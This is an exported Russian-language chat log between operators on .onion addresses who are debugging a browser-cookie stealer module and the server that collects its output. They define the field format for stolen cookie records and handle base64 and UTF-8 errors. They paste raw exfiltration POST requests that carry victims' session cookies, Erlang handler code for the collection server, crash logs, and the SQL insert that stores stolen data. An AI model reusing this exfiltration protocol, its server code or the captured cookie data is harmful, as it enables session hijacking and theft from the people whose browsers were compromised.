##################################################
Conversation between:
	- steller@q3mcco35auwcstmt.onion
	- ttrr@conference.q3mcco35auwcstmt.onion
174 messages
first: 2021-08-27T13:15:46.094948
last:  2021-08-31T11:01:29.530116
##################################################

2021-08-27T13:15:46.094948  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] defender@q3mcco35auwcstmt.onion/Psi+ приглашает вас в комнату ttrr@conference.q3mcco35auwcstmt.onion
	[en] <?>
	[fr] <?>

2021-08-27T13:33:53.539107  steller@q3mcco35auwcstmt.onion
	[ru] test
	[en] <?>
	[fr] <?>

2021-08-27T13:33:53.540190  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] test
	[en] <?>
	[fr] <?>

2021-08-30T14:53:48.796627  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] defender@q3mcco35auwcstmt.onion/Psi+ приглашает вас в комнату ttrr@conference.q3mcco35auwcstmt.onion
	[en] <?>
	[fr] <?>

2021-08-30T14:58:12.337869  steller@q3mcco35auwcstmt.onion
	[ru] test
	[en] <?>
	[fr] <?>

2021-08-30T14:58:12.358219  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] test
	[en] <?>
	[fr] <?>

2021-08-30T14:58:30.430926  steller@q3mcco35auwcstmt.onion
	[ru] test
	[en] <?>
	[fr] <?>

2021-08-30T14:58:30.432457  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] test
	[en] <?>
	[fr] <?>

2021-08-30T15:01:00.270830  steller@q3mcco35auwcstmt.onion
	[ru] тест
	[en] <?>
	[fr] <?>

2021-08-30T15:01:00.271762  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] тест
	[en] <?>
	[fr] <?>

2021-08-30T15:01:18.328350  steller@q3mcco35auwcstmt.onion
	[ru] тест
	[en] <?>
	[fr] <?>

2021-08-30T15:01:18.331105  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] тест
	[en] <?>
	[fr] <?>

2021-08-30T15:09:12.726044  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] ога
	[en] <?>
	[fr] <?>

2021-08-30T15:09:12.726605  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] чтобы сюда кодера модуля подтянуть к этому времени
	[en] <?>
	[fr] <?>

2021-08-30T15:09:12.727460  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] еще надо в лог писать длину пост данных .. потому что у меня лимит 64 кб
	[en] <?>
	[fr] <?>

2021-08-30T15:09:12.728210  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] [19:43:23] <dgh> Там надо посмотреть весь лог, суть в том что должно быть по 8 полей 
[19:43:39] <dgh> И точно такую же ошибку нам выдавало когда их было больше или меньше 
[19:43:52] <dgh> И возвращало типа что то Missmatch parametr count 
[19:43:55] <dgh> В ответе
	[en] <?>
	[fr] <?>

2021-08-30T15:09:12.728715  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] таймаут по чтению - 50 секунд
	[en] <?>
	[fr] <?>

2021-08-30T15:09:12.728908  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] Это еще можно проверить
	[en] <?>
	[fr] <?>

2021-08-30T15:09:12.729247  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] да .. надо логировать ответ сервера .. там 403 может быть с пояснением
	[en] <?>
	[fr] <?>

2021-08-30T15:09:12.729654  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] [ Username, Browser, Domain, Cookie_name, Cookie_value, Created, Expires, Path ]
такие колонки должны быть
	[en] <?>
	[fr] <?>

2021-08-30T15:09:12.729949  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] у меня может в глазах двоится .. но я насчитал в запросе 15 колонов в пост-дата
	[en] <?>
	[fr] <?>

2021-08-30T15:09:12.730415  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] колонок
	[en] <?>
	[fr] <?>

2021-08-30T15:09:12.730827  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] Я по этому куску разбил по 8 везде
	[en] <?>
	[fr] <?>

2021-08-30T15:09:12.731399  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] Или ты полный лог глядишь
	[en] <?>
	[fr] <?>

2021-08-30T15:09:12.731873  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] ?
	[en] <?>
	[fr] <?>

2021-08-30T15:09:12.732430  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] хотя нет .. 8 )
	[en] <?>
	[fr] <?>

2021-08-30T15:09:12.733122  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] То что в лимит уперлось кстати вероятно.
	[en] <?>
	[fr] <?>

2021-08-30T15:09:12.733885  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] короче надо ответ сервера логировать . будет понятнее . .есть такая возможсность ? )
	[en] <?>
	[fr] <?>

2021-08-30T15:09:12.734107  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] Тоже
	[en] <?>
	[fr] <?>

2021-08-30T15:09:12.734683  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] и размер запроса
	[en] <?>
	[fr] <?>

2021-08-30T15:09:12.735307  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] свалил )
	[en] <?>
	[fr] <?>

2021-08-30T15:09:12.735805  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] сейчас автор модуля должен зайти
	[en] <?>
	[fr] <?>

2021-08-30T15:09:35.350028  steller@q3mcco35auwcstmt.onion
	[ru] Готово
	[en] <?>
	[fr] <?>

2021-08-30T15:09:35.353552  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] Готово
	[en] <?>
	[fr] <?>

2021-08-30T15:15:06.286263  steller@q3mcco35auwcstmt.onion
	[ru] 
» [ Username, Browser, Domain, Cookie_name, Cookie_value, Created, Expires, Path ]
Разработчик админки ещё планирует 2 поля в конец добавить: Secure, HttpOnly
	[en] <?>
	[fr] <?>

2021-08-30T15:15:06.291437  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] 
» [ Username, Browser, Domain, Cookie_name, Cookie_value, Created, Expires, Path ]
Разработчик админки ещё планирует 2 поля в конец добавить: Secure, HttpOnly
	[en] <?>
	[fr] <?>

2021-08-31T08:22:38.433141  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] ну и ?
	[en] <?>
	[fr] <?>

2021-08-31T08:22:38.434105  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] одному мне больше всез надо ?
	[en] <?>
	[fr] <?>

2021-08-31T08:22:38.434949  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] со вчера вечера что-то писали тут?
	[en] <?>
	[fr] <?>

2021-08-31T08:23:54.170050  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] zulas: скинь еще раз кусок того POSTа, который был отвергнут бэком
	[en] <?>
	[fr] <?>

2021-08-31T08:24:17.348182  steller@q3mcco35auwcstmt.onion
	[ru] А тут истории нет?
Писал по поводу новых полей в записи куки
	[en] <?>
	[fr] <?>

2021-08-31T08:24:17.352436  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] А тут истории нет?
Писал по поводу новых полей в записи куки
	[en] <?>
	[fr] <?>

2021-08-31T08:24:26.070109  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] нету истории
	[en] <?>
	[fr] <?>

2021-08-31T08:26:45.180535  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] ну так на чем остановились?
	[en] <?>
	[fr] <?>

2021-08-31T08:27:19.304152  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] я остановился на этом: вот был POST, с виду нормальный, бэк на него 403 сказал. Я попросил зуласа сказать что в нем не так
	[en] <?>
	[fr] <?>

2021-08-31T08:27:38.957615  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] а я попросил расширить лог . чтобы логировало ответ
	[en] <?>
	[fr] <?>

2021-08-31T08:27:51.223612  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] и размер запроса
	[en] <?>
	[fr] <?>

2021-08-31T08:29:36.044035  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] а ты steller ?
	[en] <?>
	[fr] <?>

2021-08-31T08:31:18.947529  steller@q3mcco35auwcstmt.onion
	[ru] Писал по поводу новых полей в записи куки
	[en] <?>
	[fr] <?>

2021-08-31T08:31:18.950254  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] Писал по поводу новых полей в записи куки
	[en] <?>
	[fr] <?>

2021-08-31T08:33:03.543013  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] что именно?
	[en] <?>
	[fr] <?>

2021-08-31T08:33:15.472946  steller@q3mcco35auwcstmt.onion
	[ru] 403 встречалась раньше ошибка
-----------CJLVIYOINTQPMYSU
Content-Disposition: form-data; name="data"

user|Chrome|.google.com|ANID|	djEw171ep2SDF+UMAcWRRWBcsbp5H34/V0frREuTTKAE2F3BXw3fVVHhgYgcKidlSSPxtTs32WPiqcV/p021G67RLpNXgRDrMqljrJ16Ml1Ckwz2a2URAQ==|1588241125|1651313125|/
user|Chrome|.register.com|__utma|	djEwnpzEp2a3+eOKByaEj0nLtLL7HGvIusWq1obAuia9wTCz3pPEUF6A+gFpZ3LHPf2GSueVelCwgrXMR96kV8MmLcClokQ=|1588241143|1651313173|/

-----------CJLVIYOINTQPMYSU
Content-Disposition: form-data; name="source"

Chrome cookies
-----------CJLVIYOINTQPMYSU--

403
Mismatch parameters count!
	[en] <?>
	[fr] <?>

2021-08-31T08:33:15.477059  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] 403 встречалась раньше ошибка
-----------CJLVIYOINTQPMYSU
Content-Disposition: form-data; name="data"

user|Chrome|.google.com|ANID|	djEw171ep2SDF+UMAcWRRWBcsbp5H34/V0frREuTTKAE2F3BXw3fVVHhgYgcKidlSSPxtTs32WPiqcV/p021G67RLpNXgRDrMqljrJ16Ml1Ckwz2a2URAQ==|1588241125|1651313125|/
user|Chrome|.register.com|__utma|	djEwnpzEp2a3+eOKByaEj0nLtLL7HGvIusWq1obAuia9wTCz3pPEUF6A+gFpZ3LHPf2GSueVelCwgrXMR96kV8MmLcClokQ=|1588241143|1651313173|/

-----------CJLVIYOINTQPMYSU
Content-Disposition: form-data; name="source"

Chrome cookies
-----------CJLVIYOINTQPMYSU--

403
Mismatch parameters count!
	[en] <?>
	[fr] <?>

2021-08-31T08:33:43.140664  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] zulas: сколько полей в куки у тебя сейчас?
steller: а у тебя?
	[en] <?>
	[fr] <?>

2021-08-31T08:34:59.534959  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] [ Username, Browser, Domain, Cookie_name, Cookie_value, Created, Expires, Path ]
	[en] <?>
	[fr] <?>

2021-08-31T08:35:00.850965  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] вот поля
	[en] <?>
	[fr] <?>

2021-08-31T08:35:14.269229  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] разделитель |
	[en] <?>
	[fr] <?>

2021-08-31T08:35:28.659241  steller@q3mcco35auwcstmt.onion
	[ru] Разработчик админки планирует добавить 2 поля secure, httponly в конец записи.
Сейчас:
Username, Browser, Domain, Cookie_name, Cookie_value, Created, Expires, Path
	[en] <?>
	[fr] <?>

2021-08-31T08:35:28.667394  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] Разработчик админки планирует добавить 2 поля secure, httponly в конец записи.
Сейчас:
Username, Browser, Domain, Cookie_name, Cookie_value, Created, Expires, Path
	[en] <?>
	[fr] <?>

2021-08-31T08:35:46.677128  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] разделители строк: [ <<10>>, <<13,10>>]
	[en] <?>
	[fr] <?>

2021-08-31T08:37:31.163509  steller@q3mcco35auwcstmt.onion
	[ru] 403 была, когда некоторые поля не кодировались в В64. В отстойнике они безусловно декодировались.
	[en] <?>
	[fr] <?>

2021-08-31T08:37:31.168880  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] 403 была, когда некоторые поля не кодировались в В64. В отстойнике они безусловно декодировались.
	[en] <?>
	[fr] <?>

2021-08-31T08:38:28.741350  steller@q3mcco35auwcstmt.onion
	[ru] А что по поводу максимального размера данных, он ограничен 64КБ будет?
	[en] <?>
	[fr] <?>

2021-08-31T08:38:28.754283  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] А что по поводу максимального размера данных, он ограничен 64КБ будет?
	[en] <?>
	[fr] <?>

2021-08-31T08:39:10.942106  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] {read_length, 64000},
{read_timeout, 50000}
я могу и больше сделать
	[en] <?>
	[fr] <?>

2021-08-31T08:39:15.179828  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] таковы требоания были
	[en] <?>
	[fr] <?>

2021-08-31T08:40:40.546258  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] 50000 это в миллисекундах
	[en] <?>
	[fr] <?>

2021-08-31T08:43:47.765856  steller@q3mcco35auwcstmt.onion
	[ru] В модуле нет такого ограничения. Можно разбить на несколько запросов, в принципе.
А какие ошибки отстойник может отдавать? Их желательно как-то обрабатывать.
403 добавил в обработку. На модуль приходили ещё 404 и 500. 500, видимо, от прокладки.
	[en] <?>
	[fr] <?>

2021-08-31T08:43:47.770832  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] В модуле нет такого ограничения. Можно разбить на несколько запросов, в принципе.
А какие ошибки отстойник может отдавать? Их желательно как-то обрабатывать.
403 добавил в обработку. На модуль приходили ещё 404 и 500. 500, видимо, от прокладки.
	[en] <?>
	[fr] <?>

2021-08-31T08:45:02.925652  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] при успешном приеме и добавлении в базу dero всегда выдает 200 и /1/ ?
	[en] <?>
	[fr] <?>

2021-08-31T08:45:20.941876  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] 403 ошибка формата данных?
	[en] <?>
	[fr] <?>

2021-08-31T08:45:42.351035  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] просо 200 бывает без /1/ ?
	[en] <?>
	[fr] <?>

2021-08-31T08:45:46.772014  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] просто
	[en] <?>
	[fr] <?>

2021-08-31T08:46:17.062726  steller@q3mcco35auwcstmt.onion
	[ru] zulas:
	[en] <?>
	[fr] <?>

2021-08-31T08:46:17.066281  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] zulas:
	[en] <?>
	[fr] <?>

2021-08-31T08:47:07.171079  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] зачем этот /1/ ?
	[en] <?>
	[fr] <?>

2021-08-31T08:47:10.011646  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] reply(not_found, Req) ->
 { ok, Req1 } = cowboy_req:reply(404, [], <<"Not found">>, Req),
 Req1;

reply(forbidden, Req) ->
 { ok, Req1 } = cowboy_req:reply(403, [], <<"Forbidden">>, Req),
 Req1;

reply(missing_data, Req) ->
 { ok, Req1 } = cowboy_req:reply(403, [{<<"Forbidden">>, <<"text/plain">>}], <<"Missing data field!">>, Req),
 Req1;

reply(missing_keys, Req) ->
 { ok, Req1 } = cowboy_req:reply(403, [{<<"Forbidden">>, <<"text/plain">>}], <<"Missing keys field!">>,  Req),
 Req1;

reply(missing_parameters, Req) ->
 {ok,Req1} = cowboy_req:reply(403, [{<<"Forbidden">>, <<"text/plain">>}], <<"Mismatch parameters count!">>,  Req),
 Req1;

reply(request_timeout, Req) ->
 {ok,Req1} = cowboy_req:reply(408, [{<<"Request Timeout">>, <<"text/plain">>}], <<"Request Timeout">>,  Req),
 Req1;
	[en] <?>
	[fr] <?>

2021-08-31T08:47:16.137269  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] вот такие ошибки бывают
	[en] <?>
	[fr] <?>

2021-08-31T08:47:22.019182  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] текст у вас отобразился ?
	[en] <?>
	[fr] <?>

2021-08-31T08:47:26.446357  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] зачем этот /1/ ?
	[en] <?>
	[fr] <?>

2021-08-31T08:47:26.450862  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] reply(not_found, Req) ->
 { ok, Req1 } = cowboy_req:reply(404, [], <<"Not found">>, Req),
 Req1;

reply(forbidden, Req) ->
 { ok, Req1 } = cowboy_req:reply(403, [], <<"Forbidden">>, Req),
 Req1;

reply(missing_data, Req) ->
 { ok, Req1 } = cowboy_req:reply(403, [{<<"Forbidden">>, <<"text/plain">>}], <<"Missing data field!">>, Req),
 Req1;

reply(missing_keys, Req) ->
 { ok, Req1 } = cowboy_req:reply(403, [{<<"Forbidden">>, <<"text/plain">>}], <<"Missing keys field!">>,  Req),
 Req1;

reply(missing_parameters, Req) ->
 {ok,Req1} = cowboy_req:reply(403, [{<<"Forbidden">>, <<"text/plain">>}], <<"Mismatch parameters count!">>,  Req),
 Req1;

reply(request_timeout, Req) ->
 {ok,Req1} = cowboy_req:reply(408, [{<<"Request Timeout">>, <<"text/plain">>}], <<"Request Timeout">>,  Req),
 Req1;
	[en] <?>
	[fr] <?>

2021-08-31T08:47:26.451645  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] вот такие ошибки бывают
	[en] <?>
	[fr] <?>

2021-08-31T08:47:26.452167  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] текст у вас отобразился ?
	[en] <?>
	[fr] <?>

2021-08-31T08:47:31.374804  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] а то у меня пиджин -- и нифига
	[en] <?>
	[fr] <?>

2021-08-31T08:47:40.869820  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] отразился
	[en] <?>
	[fr] <?>

2021-08-31T08:48:11.907950  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] 200 бывает без /1/ ?
	[en] <?>
	[fr] <?>

2021-08-31T08:48:50.546255  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] по коду вроде не бывает
	[en] <?>
	[fr] <?>

2021-08-31T08:48:57.443844  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] почуму спрашиваю - нужно ли в модуле проверять получение /1/ или достаточно получить статус 200 ?
	[en] <?>
	[fr] <?>

2021-08-31T08:49:06.640957  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] [11:47:07] <hof> зачем этот /1/ ?
так по тз
	[en] <?>
	[fr] <?>

2021-08-31T08:49:25.812565  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] это типа следующая команда для клиента
	[en] <?>
	[fr] <?>

2021-08-31T08:49:29.557836  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] т.е. 200 без /1/ не бывает?
	[en] <?>
	[fr] <?>

2021-08-31T08:49:55.934733  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] не бывает
	[en] <?>
	[fr] <?>

2021-08-31T08:50:06.570101  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] ок, отлично
	[en] <?>
	[fr] <?>

2021-08-31T08:50:53.717108  steller@q3mcco35auwcstmt.onion
	[ru] zulas: А сейчас логирование запросов http есть, их можно проверить?
	[en] <?>
	[fr] <?>

2021-08-31T08:50:53.720196  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] zulas: А сейчас логирование запросов http есть, их можно проверить?
	[en] <?>
	[fr] <?>

2021-08-31T08:51:29.472149  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] есть
	[en] <?>
	[fr] <?>

2021-08-31T08:52:48.113808  steller@q3mcco35auwcstmt.onion
	[ru] Скинь тогда проблемные запросы.
	[en] <?>
	[fr] <?>

2021-08-31T08:52:48.119344  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] Скинь тогда проблемные запросы.
	[en] <?>
	[fr] <?>

2021-08-31T08:58:25.520820  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] 2021-08-31 11:52:22.415 [info] <0.6857.3> Data: <<"POST /tot57/WIN-U4U2CDE99LP_W617601.8C95D48B33FF1976677889D52ABB8859/84/ HTTP/1.0\r\nHost: 203.76.105.227\r\nX-Real-IP: 203.76.105.227\r\nX-Forwarded-For: 203.76.105.227\r\nConnection: close\r\nContent-Length: 11059\r\nAccept: */*\r\nContent-Type: multipart/form-data; boundary=---------MOBMWAMXGTKVMATK\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)\r\nCache-Control: no-cache\r\n\r\n-----------MOBMWAMXGTKVMATK\r\nContent-Disposition: form-data; name=\"data\"\r\n\r\nAdministrador|Chrome|Lmdvb2dsZS5jb20=|Q0dJQw==|RWhReFF6RkRTRUpFWDJWelRWZzVOakZOV0RrMk1TS0hBWFJsZUhRdmFIUnRiQ3hoY0hCc2FXTmhkR2x2Ymk5NGFIUnRiQ3Q0Yld3c1lYQndiR2xqWVhScGIyNHZlRzFzTzNFOU1DNDVMR2x0WVdkbEwyRjJhV1lzYVcxaFoyVXZkMlZpY0N4cGJXRm5aUzloY0c1bkxDb3ZLanR4UFRBdU9DeGhjSEJzYVdOaGRHbHZiaTl6YVdkdVpXUXRaWGhqYUdGdVoyVTdkajFpTXp0eFBUQXVPUQ==|1625670207|1641222207|L2NvbXBsZXRlL3NlYXJjaA==\r\nAdministrador|Chrome|Lmdvb2dsZS5jb20=|Q0dJQw==|RWhReFF6RkRTRUpFWDJWelRWZzVOakZOV0RrMk1TS0hBWFJsZUhRdmFIUnRiQ3hoY0hCc2FXTmhkR2x2Ymk5NGFIUnRiQ3Q0Yld3c1lYQndiR2xqWVhScGIyNHZlRzFzTzNFOU1DNDVMR2x0WVdkbEwyRjJhV1lzYVcxaFoyVXZkMlZpY0N4cGJXRm5aUzloY0c1bkxDb3ZLanR4UFRBdU9DeGhjSEJzYVdOaGRHbHZiaTl6YVdkdVpXUXRaWGhqYUdGdVoyVTdkajFpTXp0eFBUQXVPUQ==|1625670207|1641222207|L3NlYXJjaA==\r\nAdministrador|C...">>
 State: {state,#Port<0.108426>,ranch_tcp,[cowboy_router,cowboy_handler],false,[{listener,http},{dispatch,[{'_',[],[{['...'],[],http_handler,[{limits,32768,1024,4096,102400,8529920,8388608,1024}]}]}]}],undefined,undefined,5,1,100,4096,64,4096,100,5000,1630399947415}
 ReqEmpty 0
2021-08-31 11:52:22.416 [critical] <0.6857.3>@http_handler:handle:33 Error {badmatch,false} [{base64,decode_binary,2,[{file,"base64.erl"},{line,212}]},{http_handler,'-save84/3-fun-4-',5,[{file,"src/http_handler.erl"},{line,329}]},{lists,foreach,2,[{file,"lists.erl"},{line,1338}]},{http_handler,save84,3,[{file,"src/http_handler.erl"},{line,325}]},{http_handler,handle,2,[{file,"src/http_handler.erl"},{line,30}]},{cowboy_handler,handler_handle,4,[{file,"src/cowboy_handler.erl"},{line,111}]},{cowboy_protocol,execute,4,[{file,"src/cowboy_protocol.erl"},{line,443}]}]
	[en] <?>
	[fr] <?>

2021-08-31T08:58:38.142764  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] вот . не может басе64 декодировать
	[en] <?>
	[fr] <?>

2021-08-31T08:58:42.754132  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] не знаю какое поле
	[en] <?>
	[fr] <?>

2021-08-31T08:59:10.717203  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] крашей больше нет
	[en] <?>
	[fr] <?>

2021-08-31T08:59:29.608597  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] всмысли тех что хттп2
	[en] <?>
	[fr] <?>

2021-08-31T09:05:10.041653  steller@q3mcco35auwcstmt.onion
	[ru] Это старые данные. Сейчас модуль отправляет Username, Domain, Cookie_name, Cookie_value, Path  в В64
	[en] <?>
	[fr] <?>

2021-08-31T09:05:10.044616  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] Это старые данные. Сейчас модуль отправляет Username, Domain, Cookie_name, Cookie_value, Path  в В64
	[en] <?>
	[fr] <?>

2021-08-31T09:05:45.411661  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] [ Group, IdLow, IdHigh, base64:decode(Username), Browser, Domain, base64:decode(Cookie_name), base64:decode(Cookie_value), Created, Expires, base64:decode(Path) ]);

вот 4 поля декодируются только
	[en] <?>
	[fr] <?>

2021-08-31T09:05:49.216827  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] надо все ?
	[en] <?>
	[fr] <?>

2021-08-31T09:07:35.424938  steller@q3mcco35auwcstmt.onion
	[ru] Нужно домен ещё декодировать
	[en] <?>
	[fr] <?>

2021-08-31T09:07:35.427984  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] Нужно домен ещё декодировать
	[en] <?>
	[fr] <?>

2021-08-31T09:08:11.259343  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] ок .. добавил в новых версиях .
	[en] <?>
	[fr] <?>

2021-08-31T09:09:24.731328  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] <<"INSERT INTO data84 (created_at, \"group\", id_low, id_high, username, browser, \"domain\", cookie_name, cookie_value, created, expires, path ) VALUES ( now(), $1, $2, $3, $4, $5, $6, $7, $8, $9, $10, $11 )">> [<<"tot138">>,4268354464764256071,-5531770838041019469,<<149,166,247>>,<<"Firefox">>,<<".mail.ru">>,<<"mrcu">>,<<"14B45890605336B122FB29388502">>,<<"1399543312">>,<<"1714903312">>,<<"/">>]
2021-08-31 11:52:59.108 [error] <0.6879.3>@db:transform:58 Error {error,error,<<"22021">>,<<"invalid byte sequence for encoding \"UTF8\": 0x95">>,[]} with query {<<"INSERT INTO data84 (created_at, \"group\", id_low, id_high, username, browser, \"domain\", cookie_name, cookie_value, created, expires, path ) VALUES ( now(), $1, $2, $3, $4, $5, $6, $7, $8, $9, $10, $11 )">>,[<<"tot138">>,4268354464764256071,-5531770838041019469,<<149,166,247>>,<<"Firefox">>,<<".mail.ru">>,<<"mrcu">>,<<"14B45890605336B122FB29388502">>,<<"1399543312">>,<<"1714903312">>,<<"/">>]}

есть еще такое
	[en] <?>
	[fr] <?>

2021-08-31T09:09:32.432761  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] на УТФ-8 не походит кодировка
	[en] <?>
	[fr] <?>

2021-08-31T09:09:59.452667  steller@q3mcco35auwcstmt.onion
	[ru] И ещё нужно 2 поля добавить в конец записи.
secure, httponly
Значения: 0 & 1
	[en] <?>
	[fr] <?>

2021-08-31T09:09:59.455285  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] И ещё нужно 2 поля добавить в конец записи.
secure, httponly
Значения: 0 & 1
	[en] <?>
	[fr] <?>

2021-08-31T09:10:00.430154  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] насколько я понимаю это про <<149,166,247>>
	[en] <?>
	[fr] <?>

2021-08-31T09:10:26.179486  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] в таблицу колонки ?
	[en] <?>
	[fr] <?>

2021-08-31T09:10:55.305491  steller@q3mcco35auwcstmt.onion
	[ru] Да, в запись поле, в таблицу колонки.
	[en] <?>
	[fr] <?>

2021-08-31T09:10:55.306197  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] Да, в запись поле, в таблицу колонки.
	[en] <?>
	[fr] <?>

2021-08-31T09:11:43.254940  steller@q3mcco35auwcstmt.onion
	[ru] А юникод в каком поле не проходит?
	[en] <?>
	[fr] <?>

2021-08-31T09:11:43.258138  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] А юникод в каком поле не проходит?
	[en] <?>
	[fr] <?>

2021-08-31T09:20:09.638982  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] ,<<149,166,247>> я думаю вот это не может быть юникодом
	[en] <?>
	[fr] <?>

2021-08-31T09:20:45.227130  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] юзернейм
	[en] <?>
	[fr] <?>

2021-08-31T09:22:08.340946  steller@q3mcco35auwcstmt.onion
	[ru] Похоже, пользователь. Скорее всего модуль не отправляет UTF8. Нужно проверить.
А ты можешь в readme этот формат добавить + описание ошибок?
Мы уже много времени потратили на поиск этих ошибок из-за отсутствия описания протокола обмена.
	[en] <?>
	[fr] <?>

2021-08-31T09:22:08.346737  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] Похоже, пользователь. Скорее всего модуль не отправляет UTF8. Нужно проверить.
А ты можешь в readme этот формат добавить + описание ошибок?
Мы уже много времени потратили на поиск этих ошибок из-за отсутствия описания протокола обмена.
	[en] <?>
	[fr] <?>

2021-08-31T09:23:06.134832  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] формат чего ?
	[en] <?>
	[fr] <?>

2021-08-31T09:23:49.263222  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] в каталог doc есть некоторое описалово
	[en] <?>
	[fr] <?>

2021-08-31T09:23:54.882664  steller@q3mcco35auwcstmt.onion
	[ru] Кукисов, например. Ещё бы хорошо остальные данные проверить.
	[en] <?>
	[fr] <?>

2021-08-31T09:23:54.886365  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] Кукисов, например. Ещё бы хорошо остальные данные проверить.
	[en] <?>
	[fr] <?>

2021-08-31T09:24:07.883915  steller@q3mcco35auwcstmt.onion
	[ru] Там кукисы описаны?
	[en] <?>
	[fr] <?>

2021-08-31T09:24:07.889070  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] Там кукисы описаны?
	[en] <?>
	[fr] <?>

2021-08-31T09:24:16.335967  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] какие кукисы ?
	[en] <?>
	[fr] <?>

2021-08-31T09:24:39.283767  steller@q3mcco35auwcstmt.onion
	[ru] Куки, печенюшки
	[en] <?>
	[fr] <?>

2021-08-31T09:24:39.286371  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] Куки, печенюшки
	[en] <?>
	[fr] <?>

